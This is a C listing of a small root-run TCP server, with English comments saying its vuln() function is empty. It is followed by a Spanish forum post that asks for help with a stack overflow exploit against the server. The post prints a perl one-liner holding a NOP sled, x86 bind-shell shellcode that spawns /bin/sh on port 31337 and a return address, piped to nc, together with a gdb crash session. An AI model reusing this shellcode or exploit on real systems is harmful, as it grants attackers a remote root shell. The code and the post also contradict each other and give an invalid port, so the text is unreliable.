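#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>   /* close(), getuid(), _exit(): the listing used them without a prototype */

/* Listening socket and the socket of the connection currently being served.
 * File-scope so that the signal handler can close them. */
int socketfd, newsocket;

/* Forward declaration: shutup() calls times() before its definition. */
int times(void);

/*
 * Handles one message received from the client.
 *
 * In the listing as posted the body is empty: `trampa` is never read and
 * `buffer` is never written. Any copy of `trampa` into `buffer` that gets
 * added here must be bounded by sizeof buffer — the caller hands in a
 * NUL-terminated message of up to 1024 bytes.
 *
 * @param trampa NUL-terminated message received from the client.
 * @return 0 always (the original had no return statement).
 */
int vuln(char *trampa)
{
    char buffer[100];

    (void)trampa;
    (void)buffer;
    return 0;
}

/*
 * SIGTERM/SIGINT handler: closes both sockets and terminates the process.
 *
 * _exit() is async-signal-safe and is needed because merely returning from
 * the handler (as the listing did) leaves main() looping on closed
 * descriptors. NOTE: times() is only safe to call here while its body does
 * no stdio/strftime work; it currently does nothing.
 *
 * @param signal Signal number (unused).
 */
void shutup(int signal)
{
    (void)signal;
    times();
    close(newsocket);
    close(socketfd);
    _exit(0);
}

/*
 * Timestamp helper. The listing as posted only declares locals and returns 0;
 * they are kept so the interface is unchanged.
 *
 * Note the name shadows the POSIX times(2) declared in <sys/times.h>; that
 * header is not included here, but renaming would avoid the collision.
 *
 * @return 0 always.
 */
int times(void)
{
    struct tm *ahora = NULL;
    char buffer[40];

    (void)ahora;
    (void)buffer;
    return 0;
}

/*
 * Entry point. Usage: serv <port>. Must run as uid 0.
 *
 * Binds a TCP socket on every interface and serves clients one at a time:
 * each received message longer than two bytes is NUL-terminated (dropping
 * its last byte, normally the client's trailing '\n') and passed to vuln().
 *
 * Fixes relative to the listing: the port is parsed from argv[1] (it was
 * checked for presence but never used, so the server bound to port 0),
 * `host` is fully initialized instead of partly uninitialized, the results
 * of socket()/bind()/listen()/accept() are checked, and the address length
 * passed to accept() is a socklen_t.
 *
 * @return 0 on normal exit (only reached if accept() fails permanently),
 *         1 on a usage or setup error.
 */
int main(int argc, char *argv[])
{
    if (getuid() != 0) {
        return 1;
    }
    if (argc < 2) {
        return 1;
    }

    /* strtol() instead of atoi(): rejects junk and out-of-range values. */
    errno = 0;
    char *end = NULL;
    long port = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE || port < 1 || port > 65535) {
        fprintf(stderr, "Invalid port: %s\n", argv[1]);
        return 1;
    }

    socketfd = socket(AF_INET, SOCK_STREAM, 0);   /* was socket(2, 1, 0) */
    if (socketfd < 0) {
        perror("socket");
        return 1;
    }

    struct sockaddr_in host = {
        .sin_family = AF_INET,
        .sin_port = htons((uint16_t)port),
        .sin_addr.s_addr = htonl(INADDR_ANY),
    };
    if (bind(socketfd, (struct sockaddr *)&host, sizeof host) < 0) {
        perror("bind");
        close(socketfd);
        return 1;
    }
    if (listen(socketfd, 3) < 0) {
        perror("listen");
        close(socketfd);
        return 1;
    }

    times();
    signal(SIGTERM, shutup);
    signal(SIGINT, shutup);

    for (;;) {
        struct sockaddr_in client;
        socklen_t size = sizeof client;
        newsocket = accept(socketfd, (struct sockaddr *)&client, &size);
        if (newsocket < 0) {
            if (errno == EINTR) {
                continue;   /* interrupted by a signal; retry */
            }
            perror("accept");
            break;
        }
        times();

        char buffer[1024];
        ssize_t cont = recv(newsocket, buffer, sizeof buffer, 0);
        /* A message of one or two bytes (e.g. a bare "\r\n"), a closed
         * connection or an error ends the session, as in the original. */
        while (cont > 2) {
            times();
            /* Drop the last byte (usually the client's '\n') and terminate;
             * cont <= sizeof buffer, so the index is always in range. */
            buffer[cont - 1] = '\0';
            vuln(buffer);
            cont = recv(newsocket, buffer, sizeof buffer, 0);
        }
        times();
        printf("Finishing connection from %s:%d\n\n",
               inet_ntoa(client.sin_addr), ntohs(client.sin_port));
        close(newsocket);
        newsocket = -1;   /* leaves nothing stale for shutup() to close */
    }

    close(socketfd);
    return 0;
}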
Y os remito el comando que estoy usando para explotar el fallo... [8 nops + 92 shellcode + 4 ret + 1 null]
juanra@Juanra:~$ perl -e 'print "\x90"x8 . "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xc4\xf7\xff\xbf" . "\x00"' | nc -vv localhost 5555555
... el último byte (se programó así por el \n de muchos clientes) se borra.
while (cont>2) { times (); --> buffer [cont-1]='\0';
El caso es que compilo sin ninguna protección...
juanra@Juanra:~$ sudo gdb -q ./serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 01:05:14
18/02/2011 01:05:14 Starting up...
18/02/2011 01:05:21 Got connection from 127.0.0.1:45163
18/02/2011 01:05:21 RECV 113 bytes: ��������jfX�1�CRjj��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
Rh//shh/bin��R��S��̀������������
Program received signal SIGSEGV, Segmentation fault.
0xbffff801 in ?? ()
(gdb) x/16x 0xbffff801
0xbffff801: 0x00000000 0x07000000 0x04000000 0x07000000
0xbffff811: 0x1c000000 0x10bffff8 0x02000000 0x00697a00
0xbffff821: 0x02000000 0x01000000 0x00000000 0xc4000000
0xbffff831: 0x00bffff7 0x5c000000 0x00bffff8 0xc4000000
(gdb) i r eip
eip 0xbffff801 0xbffff801
(gdb)
Llevo toda la noche pensando, pero no se me ocurre nada... ¿Qué puede ser?
PD: Si os hace falta más información preguntadme.
Gracias! Un saludo
Sagrini